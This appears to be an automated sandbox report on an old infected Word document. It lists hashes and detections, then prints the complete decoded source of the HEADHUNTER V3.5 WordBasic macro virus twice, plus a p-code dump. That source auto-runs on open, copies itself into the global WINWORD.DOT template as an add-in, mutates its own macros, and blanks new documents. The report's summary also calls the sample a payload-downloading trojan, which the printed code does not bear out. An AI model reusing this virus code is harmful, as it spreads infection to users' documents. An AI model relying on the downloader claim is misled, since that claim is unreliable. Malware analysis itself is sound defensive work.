Office (OLE) malware analysis — malicious · 25f33a8592aefde5

MALICIOUS

Office (OLE)

37.0 KB Created: 2001-12-17 09:35:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: b4d4ca730d36805630e94f9ba7c0a420 SHA-1: 3df1aa660367b67ce747550a68ffbc2fda49ccdf SHA-256: 25f33a8592aefde5dd1a9b11e320fc5eb4901a13b704b47d592686ac1195bf76

128 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro markers and an AutoOpen macro, indicating it's designed to execute malicious code upon opening. The presence of 'Doc.Trojan.Hunter-5' in the ClamAV detection strongly suggests a trojan downloader. The AutoOpen macro, identified as part of 'HEADHUNTER V3.5', is known for its capability to download and execute further payloads.

Heuristics 4

ClamAV: Doc.Trojan.Hunter-5 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Hunter-5
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Attribute VB_Name = "AutoOpen"
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 9902 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	9902 bytes
SHA-256: `029458898b7828f7171869f3be2987744ed492f4a02475b4e93ddd4edaa4d033`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "ExtrasMakro" Public Sub Main() Attribute Main.VB_Description = "Erstellt, lцscht und ьberarbeitet einen Makro oder fьhrt ihn aus." Attribute Main.VB_ProcData.VB_Invoke_Func = "TemplateProject.ExtrasMakro.Main" On Error GoTo -1: On Error GoTo Exit_ Dim dlg As Object: Set dlg = WordBasic.DialogRecord.ToolsMacro(False) WordBasic.CurValues.ToolsMacro dlg dlg.Show = 1 WordBasic.Dialog.ToolsMacro dlg WordBasic.ToolsMacro dlg Exit_: End Sub Attribute VB_Name = "DateiNeu" Public Sub Main() Attribute Main.VB_Description = "Erstellt ein neues Dokument oder eine Dokumentvorlage." Attribute Main.VB_ProcData.VB_Invoke_Func = "TemplateProject.DateiNeu.Main" Dim TOYDMGUO Dim F242$ Dim GUGASYN On Error GoTo -1: On Error GoTo Exit_ Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileNew(False) WordBasic.CurValues.FileNew dlg TOYDMGUO = 128 WordBasic.Dialog.FileNew dlg F242$ = WordBasic.[DefaultDir$](8) + "\WINWORD.DOT" If WordBasic.[Files$](F242$) <> "" Then dlg.Template = F242$ dlg.NewTemplate = 1 End If WordBasic.FileNew dlg WordBasic.EditSelectAll WordBasic.WW6_EditClear GUGASYN = 170 Exit_: End Sub Attribute VB_Name = "AutoOpen" Public Sub Main() Dim f$ Dim m Dim WIBZBOT Dim i Dim a$ Dim F242$ On Error GoTo -1: On Error GoTo Exit_ Rem ********************************************************************* Rem * <HEADHUNTER V3.5> by Neurobasher, 5.11.1995, Germany * Rem * Boring experimental Winword virus with minor poly/retro/stealth * Rem ******************************************************************* Rem * "I'm looking for a man who knows the rules of the game" * Rem * "Who's able to forget them to realize my aim" * Rem ********************************************************************* If WordBasic.Second(WordBasic.Now()) < 5 Then WordBasic.ScreenUpdating Select Case WordBasic.Int(Rnd() * 2) Case 0 f$ = "AutoOpen" m = 30 Case 1 f$ = "DateiNeu" WIBZBOT = 197 m = 15 Case 2 f$ = "ExtrasMakro" m = 10 End Select WordBasic.ToolsMacro Name:=f$, Edit:=1, Show:=3 WordBasic.ParaDown WordBasic.Int(Rnd() * m) + 1 For i = 1 To WordBasic.Int(Rnd() * 10) + 2 a$ = a$ + Chr(WordBasic.Int(Rnd() * 26) + 65) Next i WordBasic.Insert Chr(13) + a$ + " =" + Str(WordBasic.Int(Rnd() * 242)) + Chr(13) + Chr(13) WordBasic.DocClose 1 WordBasic.FileSave WordBasic.ScreenUpdating 1 End If If WordBasic.[DefaultDir$](8) = "" Then WordBasic.MkDir WordBasic.[DefaultDir$](9) + "\AutoStrt" WordBasic.ChDefaultDir WordBasic.[DefaultDir$](9) + "\AutoStrt", 8 End If F242$ = WordBasic.[DefaultDir$](8) + "\WINWORD.DOT" If WordBasic.[Files$](F242$) = "" Then WordBasic.CopyFile WordBasic.[FileName$](), F242$ WordBasic.AddAddIn F242$, 1 End If Exit_: End Sub ' Processing file: /tmp/qstore_lhm027r9 ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 965 bytes ' Macros/VBA/ExtrasMakro - 1604 bytes ' Line #0: ' Line #1: ' FuncDefn (Public Sub Main()) ' Line #2: ' OnError <crash> ' BoS 0x0000 ' OnError Exit_ ' Line #3: ' Dim ' VarDefn dlg (As Object) ' BoS 0x0000 ' SetStmt ' LitVarSpecial (False) ' Ld WordBasic ' MemLd DialogRecord ' ArgsMemLd ToolsMacro 0x0001 ' Set dlg ' Line #4: ' Ld dlg ' Ld WordBasic ' MemLd CurValues ' ArgsMemCall ToolsMacro 0x0001 ' Line #5: ' LitDI2 0x0001 ' Ld dlg ' MemSt Show ' Line #6: ' Ld dlg ' Ld WordBasic ' MemLd Dialog ' ArgsMemCall ToolsMacro 0x0001 ' Line #7: ' Ld dlg ' Ld WordBasic ' ArgsMemCall ToolsMacro 0x0001 ' Line #8: ' Label Exit_ ' Line #9: ' EndSub ' Macros/VBA/DateiNeu - 2157 bytes ' Line #0: ' Line #1: ' FuncDefn (Public Sub Main()) ' Line #2: ' Dim ' VarDefn TOYDMGUO ' Line #3: ' Dim ' VarDefn F242 ' Line #4: ' Dim ' VarDefn GUGASYN ' Line #5: ' OnError <crash> ' BoS 0x0000 ' OnError Exit_ ' Line #6: ' Dim ' VarDefn dlg (As Object) ' BoS 0x0000 ' SetStmt ' LitVarSpecial (False) ' Ld WordBasic ' MemLd DialogRecord ' ArgsMemLd FileNew 0x0001 ' Set dlg ' Line #7: ' Ld dlg ' Ld WordBasic ' MemLd CurValues ' ArgsMemCall FileNew 0x0001 ' Line #8: ' Line #9: ' LitDI2 0x0080 ' St TOYDMGUO ' Line #10: ' Line #11: ' Ld dlg ' Ld WordBasic ' MemLd Dialog ' ArgsMemCall FileNew 0x0001 ' Line #12: ' LitDI2 0x0008 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x000C "\WINWORD.DOT" ' Add ' St F242$ ' Line #13: ' Ld F242$ ' Ld WordBasic ' ArgsMemLd [Files$] 0x0001 ' LitStr 0x0000 "" ' Ne ' IfBlock ' Line #14: ' Ld F242$ ' Ld dlg ' MemSt Template ' Line #15: ' LitDI2 0x0001 ' Ld dlg ' MemSt NewTemplate ' Line #16: ' EndIfBlock ' Line #17: ' Ld dlg ' Ld WordBasic ' ArgsMemCall FileNew 0x0001 ' Line #18: ' Ld WordBasic ' ArgsMemCall EditSelectAll 0x0000 ' Line #19: ' Ld WordBasic ' ArgsMemCall WW6_EditClear 0x0000 ' Line #20: ' Line #21: ' LitDI2 0x00AA ' St GUGASYN ' Line #22: ' Line #23: ' Label Exit_ ' Line #24: ' EndSub ' Macros/VBA/AutoOpen - 3871 bytes ' Line #0: ' Line #1: ' FuncDefn (Public Sub Main()) ' Line #2: ' Dim ' VarDefn False ' Line #3: ' Dim ' VarDefn m ' Line #4: ' Dim ' VarDefn WIBZBOT ' Line #5: ' Dim ' VarDefn i ' Line #6: ' Dim ' VarDefn a ' Line #7: ' Dim ' VarDefn F242 ' Line #8: ' OnError <crash> ' BoS 0x0000 ' OnError Exit_ ' Line #9: ' Line #10: ' Rem 0x0048 " *********************************************************************" ' Line #11: ' Rem 0x0048 " * <HEADHUNTER V3.5> by Neurobasher, 5.11.1995, Germany *" ' Line #12: ' Rem 0x0048 " * Boring experimental Winword virus with minor poly/retro/stealth *" ' Line #13: ' Rem 0x0048 " *******************************************************************" ' Line #14: ' Rem 0x0048 " * "I'm looking for a man who knows the rules of the game" *" ' Line #15: ' Rem 0x0048 " * "Who's able to forget them to realize my aim" *" ' Line #16: ' Rem 0x0048 " *********************************************************************" ' Line #17: ' Line #18: ' Ld WordBasic ' ArgsMemLd Now 0x0000 ' Ld WordBasic ' ArgsMemLd Second 0x0001 ' LitDI2 0x0005 ' Lt ' IfBlock ' Line #19: ' Ld WordBasic ' ArgsMemCall ScreenUpdating 0x0000 ' Line #20: ' ArgsLd Rnd 0x0000 ' LitDI2 0x0002 ' Mul ' Ld WordBasic ' ArgsMemLd InStrB 0x0001 ' SelectCase ' Line #21: ' LitDI2 0x0000 ' Case ' CaseDone ' Line #22: ' LitStr 0x0008 "AutoOpen" ' St False$ ' Line #23: ' LitDI2 0x001E ' St m ' Line #24: ' LitDI2 0x0001 ' Case ' CaseDone ' Line #25: ' LitStr 0x0008 "DateiNeu" ' St False$ ' Line #26: ' Line #27: ' LitDI2 0x00C5 ' St WIBZBOT ' Line #28: ' Line #29: ' LitDI2 0x000F ' St m ' Line #30: ' LitDI2 0x0002 ' Case ' CaseDone ' Line #31: ' LitStr 0x000B "ExtrasMakro" ' St False$ ' Line #32: ' LitDI2 0x000A ' St m ' Line #33: ' EndSelect ' Line #34: ' Ld False$ ' ParamNamed New ' LitDI2 0x0001 ' ParamNamed Edit ' LitDI2 0x0003 ' ParamNamed Show ' Ld WordBasic ' ArgsMemCall ToolsMacro 0x0003 ' Line #35: ' ArgsLd Rnd 0x0000 ' Ld m ' Mul ' Ld WordBasic ' ArgsMemLd InStrB 0x0001 ' LitDI2 0x0001 ' Add ' Ld WordBasic ' ArgsMemCall ParaDown 0x0001 ' Line #36: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' ArgsLd Rnd 0x0000 ' LitDI2 0x000A ' Mul ' Ld WordBasic ' ArgsMemLd InStrB 0x0001 ' LitDI2 0x0002 ' Add ' For ' Line #37: ' Ld a$ ' ArgsLd Rnd 0x0000 ' LitDI2 0x001A ' Mul ' Ld WordBasic ' ArgsMemLd InStrB 0x0001 ' LitDI2 0x0041 ' Add ' ArgsLd Chr 0x0001 ' Add ' St a$ ' Line #38: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #39: ' LitDI2 0x000D ' ArgsLd Chr 0x0001 ' Ld a$ ' Add ' LitStr 0x0002 " =" ' Add ' ArgsLd Rnd 0x0000 ' LitDI2 0x00F2 ' Mul ' Ld WordBasic ' ArgsMemLd InStrB 0x0001 ' ArgsLd Str 0x0001 ' Add ' LitDI2 0x000D ' ArgsLd Chr 0x0001 ' Add ' LitDI2 0x000D ' ArgsLd Chr 0x0001 ' Add ' Ld WordBasic ' ArgsMemCall Insert 0x0001 ' Line #40: ' LitDI2 0x0001 ' Ld WordBasic ' ArgsMemCall DocClose 0x0001 ' Line #41: ' Ld WordBasic ' ArgsMemCall FileSave 0x0000 ' Line #42: ' LitDI2 0x0001 ' Ld WordBasic ' ArgsMemCall ScreenUpdating 0x0001 ' Line #43: ' EndIfBlock ' Line #44: ' Line #45: ' LitDI2 0x0008 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #46: ' LitDI2 0x0009 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x0009 "\AutoStrt" ' Add ' Ld WordBasic ' ArgsMemCall MkDir 0x0001 ' Line #47: ' LitDI2 0x0009 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x0009 "\AutoStrt" ' Add ' LitDI2 0x0008 ' Ld WordBasic ' ArgsMemCall ChDefaultDir 0x0002 ' Line #48: ' EndIfBlock ' Line #49: ' Line #50: ' LitDI2 0x0008 ' Ld WordBasic ' ArgsMemLd [DefaultDir$] 0x0001 ' LitStr 0x000C "\WINWORD.DOT" ' Add ' St F242$ ' Line #51: ' Ld F242$ ' Ld WordBasic ' ArgsMemLd [Files$] 0x0001 ' LitStr 0x0000 "" ' Eq ' IfBlock ' Line #52: ' Ld WordBasic ' ArgsMemLd [FileName$] 0x0000 ' Ld F242$ ' Ld WordBasic ' ArgsMemCall CopyFile 0x0002 ' Line #53: ' Ld F242$ ' LitDI2 0x0001 ' Ld WordBasic ' ArgsMemCall AddAddIn 0x0002 ' Line #54: ' EndIfBlock ' Line #55: ' Line #56: ' Label Exit_ ' Line #57: ' EndSub

SHA-256: 029458898b7828f7171869f3be2987744ed492f4a02475b4e93ddd4edaa4d033

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ExtrasMakro"

Public Sub Main()
Attribute Main.VB_Description = "Erstellt, lцscht und ьberarbeitet einen Makro oder fьhrt ihn aus."
Attribute Main.VB_ProcData.VB_Invoke_Func = "TemplateProject.ExtrasMakro.Main"
On Error GoTo -1: On Error GoTo Exit_
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.ToolsMacro(False)
WordBasic.CurValues.ToolsMacro dlg
dlg.Show = 1
WordBasic.Dialog.ToolsMacro dlg
WordBasic.ToolsMacro dlg
Exit_:
End Sub

Attribute VB_Name = "DateiNeu"

Public Sub Main()
Attribute Main.VB_Description = "Erstellt ein neues Dokument oder eine Dokumentvorlage."
Attribute Main.VB_ProcData.VB_Invoke_Func = "TemplateProject.DateiNeu.Main"
Dim TOYDMGUO
Dim F242$
Dim GUGASYN
On Error GoTo -1: On Error GoTo Exit_
Dim dlg As Object: Set dlg = WordBasic.DialogRecord.FileNew(False)
WordBasic.CurValues.FileNew dlg

TOYDMGUO = 128

WordBasic.Dialog.FileNew dlg
F242$ = WordBasic.[DefaultDir$](8) + "\WINWORD.DOT"
If WordBasic.[Files$](F242$) <> "" Then
 dlg.Template = F242$
 dlg.NewTemplate = 1
End If
WordBasic.FileNew dlg
WordBasic.EditSelectAll
WordBasic.WW6_EditClear

GUGASYN = 170

Exit_:
End Sub

Attribute VB_Name = "AutoOpen"

Public Sub Main()
Dim f$
Dim m
Dim WIBZBOT
Dim i
Dim a$
Dim F242$
On Error GoTo -1: On Error GoTo Exit_

Rem ***********************************************************************
Rem ***      <HEADHUNTER V3.5> by Neurobasher, 5.11.1995, Germany       ***
Rem *** Boring experimental Winword virus with minor poly/retro/stealth ***
Rem ***********************************************************************
Rem *** "I'm looking for a man who knows the rules of the game"         ***
Rem *** "Who's able to forget them to realize my aim"                   ***
Rem ***********************************************************************

If WordBasic.Second(WordBasic.Now()) < 5 Then
 WordBasic.ScreenUpdating
 Select Case WordBasic.Int(Rnd() * 2)
  Case 0
    f$ = "AutoOpen"
    m = 30
  Case 1
    f$ = "DateiNeu"

WIBZBOT = 197

    m = 15
  Case 2
    f$ = "ExtrasMakro"
    m = 10
 End Select
 WordBasic.ToolsMacro Name:=f$, Edit:=1, Show:=3
 WordBasic.ParaDown WordBasic.Int(Rnd() * m) + 1
 For i = 1 To WordBasic.Int(Rnd() * 10) + 2
  a$ = a$ + Chr(WordBasic.Int(Rnd() * 26) + 65)
 Next i
 WordBasic.Insert Chr(13) + a$ + " =" + Str(WordBasic.Int(Rnd() * 242)) + Chr(13) + Chr(13)
 WordBasic.DocClose 1
 WordBasic.FileSave
 WordBasic.ScreenUpdating 1
End If

If WordBasic.[DefaultDir$](8) = "" Then
 WordBasic.MkDir WordBasic.[DefaultDir$](9) + "\AutoStrt"
 WordBasic.ChDefaultDir WordBasic.[DefaultDir$](9) + "\AutoStrt", 8
End If

F242$ = WordBasic.[DefaultDir$](8) + "\WINWORD.DOT"
If WordBasic.[Files$](F242$) = "" Then
 WordBasic.CopyFile WordBasic.[FileName$](), F242$
 WordBasic.AddAddIn F242$, 1
End If

Exit_:
End Sub

' Processing file: /tmp/qstore_lhm027r9
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/ExtrasMakro - 1604 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub Main())
' Line #2:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError Exit_ 
' Line #3:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd ToolsMacro 0x0001 
' 	Set dlg 
' Line #4:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall ToolsMacro 0x0001 
' Line #5:
' 	LitDI2 0x0001 
' 	Ld dlg 
' 	MemSt Show 
' Line #6:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall ToolsMacro 0x0001 
' Line #7:
' 	Ld dlg 
' 	Ld WordBasic 
' 	ArgsMemCall ToolsMacro 0x0001 
' Line #8:
' 	Label Exit_ 
' Line #9:
' 	EndSub 
' Macros/VBA/DateiNeu - 2157 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub Main())
' Line #2:
' 	Dim 
' 	VarDefn TOYDMGUO
' Line #3:
' 	Dim 
' 	VarDefn F242
' Line #4:
' 	Dim 
' 	VarDefn GUGASYN
' Line #5:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError Exit_ 
' Line #6:
' 	Dim 
' 	VarDefn dlg (As Object)
' 	BoS 0x0000 
' 	SetStmt 
' 	LitVarSpecial (False)
' 	Ld WordBasic 
' 	MemLd DialogRecord 
' 	ArgsMemLd FileNew 0x0001 
' 	Set dlg 
' Line #7:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd CurValues 
' 	ArgsMemCall FileNew 0x0001 
' Line #8:
' Line #9:
' 	LitDI2 0x0080 
' 	St TOYDMGUO 
' Line #10:
' Line #11:
' 	Ld dlg 
' 	Ld WordBasic 
' 	MemLd Dialog 
' 	ArgsMemCall FileNew 0x0001 
' Line #12:
' 	LitDI2 0x0008 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x000C "\WINWORD.DOT"
' 	Add 
' 	St F242$ 
' Line #13:
' 	Ld F242$ 
' 	Ld WordBasic 
' 	ArgsMemLd [Files$] 0x0001 
' 	LitStr 0x0000 ""
' 	Ne 
' 	IfBlock 
' Line #14:
' 	Ld F242$ 
' 	Ld dlg 
' 	MemSt Template 
' Line #15:
' 	LitDI2 0x0001 
' 	Ld dlg 
' 	MemSt NewTemplate 
' Line #16:
' 	EndIfBlock 
' Line #17:
' 	Ld dlg 
' 	Ld WordBasic 
' 	ArgsMemCall FileNew 0x0001 
' Line #18:
' 	Ld WordBasic 
' 	ArgsMemCall EditSelectAll 0x0000 
' Line #19:
' 	Ld WordBasic 
' 	ArgsMemCall WW6_EditClear 0x0000 
' Line #20:
' Line #21:
' 	LitDI2 0x00AA 
' 	St GUGASYN 
' Line #22:
' Line #23:
' 	Label Exit_ 
' Line #24:
' 	EndSub 
' Macros/VBA/AutoOpen - 3871 bytes
' Line #0:
' Line #1:
' 	FuncDefn (Public Sub Main())
' Line #2:
' 	Dim 
' 	VarDefn False
' Line #3:
' 	Dim 
' 	VarDefn m
' Line #4:
' 	Dim 
' 	VarDefn WIBZBOT
' Line #5:
' 	Dim 
' 	VarDefn i
' Line #6:
' 	Dim 
' 	VarDefn a
' Line #7:
' 	Dim 
' 	VarDefn F242
' Line #8:
' 	OnError <crash> 
' 	BoS 0x0000 
' 	OnError Exit_ 
' Line #9:
' Line #10:
' 	Rem 0x0048 " ***********************************************************************"
' Line #11:
' 	Rem 0x0048 " ***      <HEADHUNTER V3.5> by Neurobasher, 5.11.1995, Germany       ***"
' Line #12:
' 	Rem 0x0048 " *** Boring experimental Winword virus with minor poly/retro/stealth ***"
' Line #13:
' 	Rem 0x0048 " ***********************************************************************"
' Line #14:
' 	Rem 0x0048 " *** "I'm looking for a man who knows the rules of the game"         ***"
' Line #15:
' 	Rem 0x0048 " *** "Who's able to forget them to realize my aim"                   ***"
' Line #16:
' 	Rem 0x0048 " ***********************************************************************"
' Line #17:
' Line #18:
' 	Ld WordBasic 
' 	ArgsMemLd Now 0x0000 
' 	Ld WordBasic 
' 	ArgsMemLd Second 0x0001 
' 	LitDI2 0x0005 
' 	Lt 
' 	IfBlock 
' Line #19:
' 	Ld WordBasic 
' 	ArgsMemCall ScreenUpdating 0x0000 
' Line #20:
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x0002 
' 	Mul 
' 	Ld WordBasic 
' 	ArgsMemLd InStrB 0x0001 
' 	SelectCase 
' Line #21:
' 	LitDI2 0x0000 
' 	Case 
' 	CaseDone 
' Line #22:
' 	LitStr 0x0008 "AutoOpen"
' 	St False$ 
' Line #23:
' 	LitDI2 0x001E 
' 	St m 
' Line #24:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #25:
' 	LitStr 0x0008 "DateiNeu"
' 	St False$ 
' Line #26:
' Line #27:
' 	LitDI2 0x00C5 
' 	St WIBZBOT 
' Line #28:
' Line #29:
' 	LitDI2 0x000F 
' 	St m 
' Line #30:
' 	LitDI2 0x0002 
' 	Case 
' 	CaseDone 
' Line #31:
' 	LitStr 0x000B "ExtrasMakro"
' 	St False$ 
' Line #32:
' 	LitDI2 0x000A 
' 	St m 
' Line #33:
' 	EndSelect 
' Line #34:
' 	Ld False$ 
' 	ParamNamed New 
' 	LitDI2 0x0001 
' 	ParamNamed Edit 
' 	LitDI2 0x0003 
' 	ParamNamed Show 
' 	Ld WordBasic 
' 	ArgsMemCall ToolsMacro 0x0003 
' Line #35:
' 	ArgsLd Rnd 0x0000 
' 	Ld m 
' 	Mul 
' 	Ld WordBasic 
' 	ArgsMemLd InStrB 0x0001 
' 	LitDI2 0x0001 
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall ParaDown 0x0001 
' Line #36:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x000A 
' 	Mul 
' 	Ld WordBasic 
' 	ArgsMemLd InStrB 0x0001 
' 	LitDI2 0x0002 
' 	Add 
' 	For 
' Line #37:
' 	Ld a$ 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x001A 
' 	Mul 
' 	Ld WordBasic 
' 	ArgsMemLd InStrB 0x0001 
' 	LitDI2 0x0041 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	St a$ 
' Line #38:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #39:
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Ld a$ 
' 	Add 
' 	LitStr 0x0002 " ="
' 	Add 
' 	ArgsLd Rnd 0x0000 
' 	LitDI2 0x00F2 
' 	Mul 
' 	Ld WordBasic 
' 	ArgsMemLd InStrB 0x0001 
' 	ArgsLd Str 0x0001 
' 	Add 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall Insert 0x0001 
' Line #40:
' 	LitDI2 0x0001 
' 	Ld WordBasic 
' 	ArgsMemCall DocClose 0x0001 
' Line #41:
' 	Ld WordBasic 
' 	ArgsMemCall FileSave 0x0000 
' Line #42:
' 	LitDI2 0x0001 
' 	Ld WordBasic 
' 	ArgsMemCall ScreenUpdating 0x0001 
' Line #43:
' 	EndIfBlock 
' Line #44:
' Line #45:
' 	LitDI2 0x0008 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #46:
' 	LitDI2 0x0009 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x0009 "\AutoStrt"
' 	Add 
' 	Ld WordBasic 
' 	ArgsMemCall MkDir 0x0001 
' Line #47:
' 	LitDI2 0x0009 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x0009 "\AutoStrt"
' 	Add 
' 	LitDI2 0x0008 
' 	Ld WordBasic 
' 	ArgsMemCall ChDefaultDir 0x0002 
' Line #48:
' 	EndIfBlock 
' Line #49:
' Line #50:
' 	LitDI2 0x0008 
' 	Ld WordBasic 
' 	ArgsMemLd [DefaultDir$] 0x0001 
' 	LitStr 0x000C "\WINWORD.DOT"
' 	Add 
' 	St F242$ 
' Line #51:
' 	Ld F242$ 
' 	Ld WordBasic 
' 	ArgsMemLd [Files$] 0x0001 
' 	LitStr 0x0000 ""
' 	Eq 
' 	IfBlock 
' Line #52:
' 	Ld WordBasic 
' 	ArgsMemLd [FileName$] 0x0000 
' 	Ld F242$ 
' 	Ld WordBasic 
' 	ArgsMemCall CopyFile 0x0002 
' Line #53:
' 	Ld F242$ 
' 	LitDI2 0x0001 
' 	Ld WordBasic 
' 	ArgsMemCall AddAddIn 0x0002 
' Line #54:
' 	EndIfBlock 
' Line #55:
' Line #56:
' 	Label Exit_ 
' Line #57:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.